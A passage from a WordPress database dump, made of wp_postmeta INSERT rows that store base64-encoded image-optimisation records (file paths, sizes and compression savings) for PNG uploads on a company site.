joiMjQ3IiwiaGVpZ2h0IjoiMTE0IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21pbGdsaWRlLWUxNDcxNjI0NzY4NDY1LTI0N3gxMTQucG5nIiwicmVkdWN0aW9uIjozNjE5LCJ0aW1lIjoxNDgzNTkyNjAzLCJpZCI6NjI3fV0='); 
INSERT INTO `wp_postmeta` VALUES (30485, 626, 'wpfc_optimisation_reduction', '21870'); 
INSERT INTO `wp_postmeta` VALUES (30486, 626, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsc29sdi1lMTQ3MTYyNDc0NTU3MC5wbmciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbHNvbHYtZTE0NzE2MjQ3NDU1NzAucG5nIiwid2lkdGgiOjI3NSwiaGVpZ2h0IjoxMTQsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxzb2x2LWUxNDcxNjI0NzQ1NTcwLnBuZyIsInJlZHVjdGlvbiI6Mzk4MSwidGltZSI6MTQ4MzU5MjYwOSwiaWQiOiI2MjYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbHNvbHYtZTE0NzE2MjQ3NDU1NzAtMjUweDExNC5wbmciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjExNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxzb2x2LWUxNDcxNjI0NzQ1NTcwLTI1MHgxMTQucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxzb2x2LWUxNDcxNjI0NzQ1NTcwLTI1MHgxMTQucG5nIiwicmVkdWN0aW9uIjozOTAxLCJ0aW1lIjoxNDgzNTkyNjEzLCJpZCI6NjI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbHNvbHYtZTE0NzE2MjQ3NDU1NzAtMjAweDExNC5wbmciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjExNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxzb2x2LWUxNDcxNjI0NzQ1NTcwLTIwMHgxMTQucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxzb2x2LWUxNDcxNjI0NzQ1NTcwLTIwMHgxMTQucG5nIiwicmVkdWN0aW9uIjozNjU5LCJ0aW1lIjoxNDgzNTkyNjE2LCJpZCI6NjI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbHNvbHYtZTE0NzE2MjQ3NDU1NzAtMjI1eDExNC5wbmciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjExNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxzb2x2LWUxNDcxNjI0NzQ1NTcwLTIyNXgxMTQucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxzb2x2LWUxNDcxNjI0NzQ1NTcwLTIyNXgxMTQucG5nIiwicmVkdWN0aW9uIjozODQzLCJ0aW1lIjoxNDgzNTkyNjE5LCJpZCI6NjI2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsc29sdi1lMTQ3MTYyNDc0NTU3MC0xMTR4MTE0LnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbHNvbHYtZTE0NzE2MjQ3NDU1NzAtMTE0eDExNC5wbmciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjExNCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxzb2x2LWUxNDcxNjI0NzQ1NTcwLTExNHgxMTQucG5nIiwicmVkdWN0aW9uIjoyNjEwLCJ0aW1lIjoxNDgzNTkyNjIzLCJpZCI6NjI2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsc29sdi1lMTQ3MTYyNDc0NTU3MC0yNDd4MTE0LnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbHNvbHYtZTE0NzE2MjQ3NDU1NzAtMjQ3eDExNC5wbmciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjExNCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxzb2x2LWUxNDcxNjI0NzQ1NTcwLTI0N3gxMTQucG5nIiwicmVkdWN0aW9uIjozODc2LCJ0aW1lIjoxNDgzNTkyNjI2LCJpZCI6NjI2fV0='); 
INSERT INTO `wp_postmeta` VALUES (30487, 624, 'wpfc_optimisation_reduction', '14519'); 
INSERT INTO `wp_postmeta` VALUES (30488, 624, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsbHViZS1lMTQ3MTYyNDU5MDEyNy5wbmciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGx1YmUtZTE0NzE2MjQ1OTAxMjcucG5nIiwid2lkdGgiOjI3NSwiaGVpZ2h0IjoxMTQsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxsdWJlLWUxNDcxNjI0NTkwMTI3LnBuZyIsInJlZHVjdGlvbiI6Mjg5OSwidGltZSI6MTQ4MzU5MjYzMywiaWQiOiI2MjQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGx1YmUtZTE0NzE2MjQ1OTAxMjctMjUweDExNC5wbmciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjExNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxsdWJlLWUxNDcxNjI0NTkwMTI3LTI1MHgxMTQucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxsdWJlLWUxNDcxNjI0NTkwMTI3LTI1MHgxMTQucG5nIiwicmVkdWN0aW9uIjoyODIzLCJ0aW1lIjoxNDgzNTkyNjM2LCJpZCI6NjI0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGx1YmUtZTE0NzE2MjQ1OTAxMjctMjAweDExNC5wbmciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjExNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxsdWJlLWUxNDcxNjI0NTkwMTI3LTIwMHgxMTQucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxsdWJlLWUxNDcxNjI0NTkwMTI3LTIwMHgxMTQucG5nIiwicmVkdWN0aW9uIjoyNDYxLCJ0aW1lIjoxNDgzNTkyNjQwLCJpZCI6NjI0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGx1YmUtZTE0NzE2MjQ1OTAxMjctMjI1eDExNC5wbmciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjExNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxsdWJlLWUxNDcxNjI0NTkwMTI3LTIyNXgxMTQucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxsdWJlLWUxNDcxNjI0NTkwMTI3LTIyNXgxMTQucG5nIiwicmVkdWN0aW9uIjoyNzMxLCJ0aW1lIjoxNDgzNTkyNjQzLCJpZCI6NjI0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsbHViZS1lMTQ3MTYyNDU5MDEyNy0xMTR4MTE0LnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGx1YmUtZTE0NzE2MjQ1OTAxMjctMTE0eDExNC5wbmciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjExNCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9taWxsdWJlLWUxNDcxNjI0NTkwMTI3LTExNHgxMTQucG5nIiwicmVkdWN0aW9uIjo3ODksInRpbWUiOjE0ODM1OTI2NDYsImlkIjo2MjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxsdWJlLWUxNDcxNjI0NTkwMTI3LTI0N3gxMTQucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsbHViZS1lMTQ3MTYyNDU5MDEyNy0yNDd4MTE0LnBuZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMTE0IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21pbGx1YmUtZTE0NzE2MjQ1OTAxMjctMjQ3eDExNC5wbmciLCJyZWR1Y3Rpb24iOjI4MTYsInRpbWUiOjE0ODM1OTI2NTAsImlkIjo2MjR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30489, 610, 'wpfc_optimisation_reduction', '56740'); 
INSERT INTO `wp_postmeta` VALUES (30490, 610, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvT3B0ZW9uX0hfc3BlY2lhbHR5X2ZsdWlkc19TVS1lMTQ3MTYyMTU0Nzk4NC5wbmciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL09wdGVvbl9IX3NwZWNpYWx0eV9mbHVpZHNfU1UtZTE0NzE2MjE1NDc5ODQucG5nIiwid2lkdGgiOjY5MCwiaGVpZ2h0IjoyNzEsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LnBuZyIsInJlZHVjdGlvbiI6ODc1NCwidGltZSI6MTQ4MzU5MjY1NywiaWQiOiI2MTAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL09wdGVvbl9IX3NwZWNpYWx0eV9mbHVpZHNfU1UtZTE0NzE2MjE1NDc5ODQtMzQweDI3MS5wbmciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjI3MSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTM0MHgyNzEucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTM0MHgyNzEucG5nIiwicmVkdWN0aW9uIjo0ODEyLCJ0aW1lIjoxNDgzNTkyNjYwLCJpZCI6NjEwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL09wdGVvbl9IX3NwZWNpYWx0eV9mbHVpZHNfU1UtZTE0NzE2MjE1NDc5ODQtMjUweDI1MC5wbmciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTI1MHgyNTAucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTI1MHgyNTAucG5nIiwicmVkdWN0aW9uIjo2MzU3LCJ0aW1lIjoxNDgzNTkyNjY1LCJpZCI6NjEwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL09wdGVvbl9IX3NwZWNpYWx0eV9mbHVpZHNfU1UtZTE0NzE2MjE1NDc5ODQtMjAweDIwMC5wbmciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTIwMHgyMDAucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTIwMHgyMDAucG5nIiwicmVkdWN0aW9uIjo0NTUwLCJ0aW1lIjoxNDgzNTkyNjY5LCJpZCI6NjEwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL09wdGVvbl9IX3NwZWNpYWx0eV9mbHVpZHNfU1UtZTE0NzE2MjE1NDc5ODQtMjI1eDIyNS5wbmciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTIyNXgyMjUucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTIyNXgyMjUucG5nIiwicmVkdWN0aW9uIjo1MzQ3LCJ0aW1lIjoxNDgzNTkyNjczLCJpZCI6NjEwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL09wdGVvbl9IX3NwZWNpYWx0eV9mbHVpZHNfU1UtZTE0NzE2MjE1NDc5ODQtNTEweDI3MS5wbmciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjI3MSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTUxMHgyNzEucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTUxMHgyNzEucG5nIiwicmVkdWN0aW9uIjo3MDM3LCJ0aW1lIjoxNDgzNTkyNjc2LCJpZCI6NjEwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvT3B0ZW9uX0hfc3BlY2lhbHR5X2ZsdWlkc19TVS1lMTQ3MTYyMTU0Nzk4NC0xMTR4MTMwLnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL09wdGVvbl9IX3NwZWNpYWx0eV9mbHVpZHNfU1UtZTE0NzE2MjE1NDc5ODQtMTE0eDEzMC5wbmciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTExNHgxMzAucG5nIiwicmVkdWN0aW9uIjoxODgyLCJ0aW1lIjoxNDgzNTkyNjgwLCJpZCI6NjEwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvT3B0ZW9uX0hfc3BlY2lhbHR5X2ZsdWlkc19TVS1lMTQ3MTYyMTU0Nzk4NC0xODB4MTgwLnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL09wdGVvbl9IX3NwZWNpYWx0eV9mbHVpZHNfU1UtZTE0NzE2MjE1NDc5ODQtMTgweDE4MC5wbmciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTE4MHgxODAucG5nIiwicmVkdWN0aW9uIjozODM1LCJ0aW1lIjoxNDgzNTkyNjgzLCJpZCI6NjEwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvT3B0ZW9uX0hfc3BlY2lhbHR5X2ZsdWlkc19TVS1lMTQ3MTYyMTU0Nzk4NC0yNDd4MjcxLnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL09wdGVvbl9IX3NwZWNpYWx0eV9mbHVpZHNfU1UtZTE0NzE2MjE1NDc5ODQtMjQ3eDI3MS5wbmciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjI3MSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTI0N3gyNzEucG5nIiwicmVkdWN0aW9uIjozODQ2LCJ0aW1lIjoxNDgzNTkyNjg3LCJpZCI6NjEwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvT3B0ZW9uX0hfc3BlY2lhbHR5X2ZsdWlkc19TVS1lMTQ3MTYyMTU0Nzk4NC0zMDB4MjcxLnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL09wdGVvbl9IX3NwZWNpYWx0eV9mbHVpZHNfU1UtZTE0NzE2MjE1NDc5ODQtMzAweDI3MS5wbmciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjI3MSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTMwMHgyNzEucG5nIiwicmVkdWN0aW9uIjo0NzA2LCJ0aW1lIjoxNDgzNTkyNjkwLCJpZCI6NjEwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvT3B0ZW9uX0hfc3BlY2lhbHR5X2ZsdWlkc19TVS1lMTQ3MTYyMTU0Nzk4NC00MDB4MjcxLnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL09wdGVvbl9IX3NwZWNpYWx0eV9mbHVpZHNfU1UtZTE0NzE2MjE1NDc5ODQtNDAweDI3MS5wbmciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjI3MSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9PcHRlb25fSF9zcGVjaWFsdHlfZmx1aWRzX1NVLWUxNDcxNjIxNTQ3OTg0LTQwMHgyNzEucG5nIiwicmVkdWN0aW9uIjo1NjE0LCJ0aW1lIjoxNDgzNTkyNjk0LCJpZCI6NjEwfV0='); 
INSERT INTO `wp_postmeta` VALUES (30491, 201, 'wpfc_optimisation_reduction', '9250'); 
